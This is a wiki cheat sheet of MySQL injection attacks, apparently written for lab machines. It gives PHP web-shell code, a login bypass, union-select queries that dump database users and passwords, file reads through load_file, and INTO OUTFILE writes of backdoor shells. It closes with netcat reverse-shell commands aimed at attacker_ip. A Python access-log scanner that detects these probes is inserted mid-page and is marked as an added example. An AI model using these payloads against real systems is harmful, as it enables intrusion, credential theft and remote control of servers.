MySQL Injection
lethanhtung01011980 edited this page Jun 16, 2020 · 24 revisions
- Mainly for PHP and MySQL
- To attack on non-validated user inputs
- To know the database
- To execute remote code
SQL injection for PHP; the following can be put in an HTML textbox:
<?php echo system($_REQUEST["cmd"]); ?>
Then execute it with a custom cmd: http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=uname
Attack on a non-validated username and password
- Key in the username as:
wronguser' or 1=1 LIMIT 1;#
Basic checks for SQL injection
- Key in ' or " in a text input and see whether a debug error appears.
- Key in ' or " in GET parameters and see whether a debug error appears.
- Append and 1 = 1 and then and 1 = 2 behind the suspected parameter and compare the two outputs.
Check if a 7th column exists
- http://victim_ip/comment.php?id=738 order by 7
If we have 6 columns, we can check which columns are displayed.
- http://victim_ip/comment.php?id=738 union all select 1,2,3,4,5,6
Assume the 5th column can be shown.
- Get MySql version: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,@@version,6
- Get Mysql user: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,user(),6
- Get all table names: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
- Get users: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
- Get users and passwords: 0x3a is ":". http://victim_ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
Notes:
- On Linux, file access may be restricted by user permissions.
To load a file
http://victim_ip/comment.php?id=738 union select 1,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6 FROM users
To create a file using outfile
http://victim-ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
- To put behind the vulnerable parameter:
' union all select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/var/www/backdoor.php' #
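From the defender's side, the probe sequence listed above (quote tests, order by N, union all select, information_schema reads, @@version/user(), load_file, into outfile) leaves a distinctive trail in the web server access log. The following is an added example, not part of the original page: a small Python scanner that normalises each request's query string (URL-decode, lower-case, strip comments) and labels which of those probes it matches. The log lines are constructed samples, and the common-log regex and pattern labels are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus
# One regex per probe technique listed above, matched against a normalised query string.
PROBE_PATTERNS = [
    ("boolean-tautology", re.compile(r"'\s*or\s+1\s*=\s*1")),
    ("boolean-diff",      re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("column-count",      re.compile(r"\border\s+by\s+\d+\b")),
    ("union-select",      re.compile(r"\bunion(\s+all)?\s+select\b")),
    ("schema-enum",       re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("version-or-user",   re.compile(r"@@version|\buser\(\)")),
    ("file-read",         re.compile(r"\bload_file\s*\(")),
    ("file-write",        re.compile(r"\binto\s+outfile\b")),
]

# Common/combined access-log format: client ip, identity, user, [time], "METHOD path proto", status.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalise(raw):
    """URL-decode twice (unwraps double encoding), lower-case, drop /* */ comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(raw)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)

def classify_request(path):
    """Return the labels of every probe pattern present in the request's query string."""
    if "?" not in path:
        return []
    query = normalise(path.split("?", 1)[1])
    return [label for label, pat in PROBE_PATTERNS if pat.search(query)]

def scan_log(lines):
    """Return (client ip, path, labels) for each log line whose query string carries a probe."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            labels = classify_request(m["path"])
            if labels:
                hits.append((m["ip"], m["path"], labels))
    return hits

# Constructed sample access log; the requests mirror the probe sequence described on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2020:10:00:01 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512
203.0.113.5 - - [16/Jun/2020:10:00:02 +0000] "GET /comment.php?id=738%20order%20by%207 HTTP/1.1" 500 87
203.0.113.5 - - [16/Jun/2020:10:00:03 +0000] "GET /comment.php?id=738%20union%20all%20select%201,2,3,4,@@version,6 HTTP/1.1" 200 530
203.0.113.5 - - [16/Jun/2020:10:00:04 +0000] "GET /comment.php?id=738+union+select+1,2,3,4,load_file(%27/etc/hosts%27),6 HTTP/1.1" 200 600
198.51.100.9 - - [16/Jun/2020:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1024
"""
```

Running `scan_log(SAMPLE_LOG.splitlines())` flags the three probing requests from 203.0.113.5 and leaves the two ordinary requests alone; a single client stepping through column-count, union-select and file-read labels within seconds is the pattern worth alerting on.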
Sample reverse shell payloads for "cmd"
- Linux victim to execute reverse shell:
nc -nv attacker_ip 4444 -e /bin/bash
- Windows victim to execute reverse shell:
nc.exe -nv attacker_ip 4444 -e cmd.exe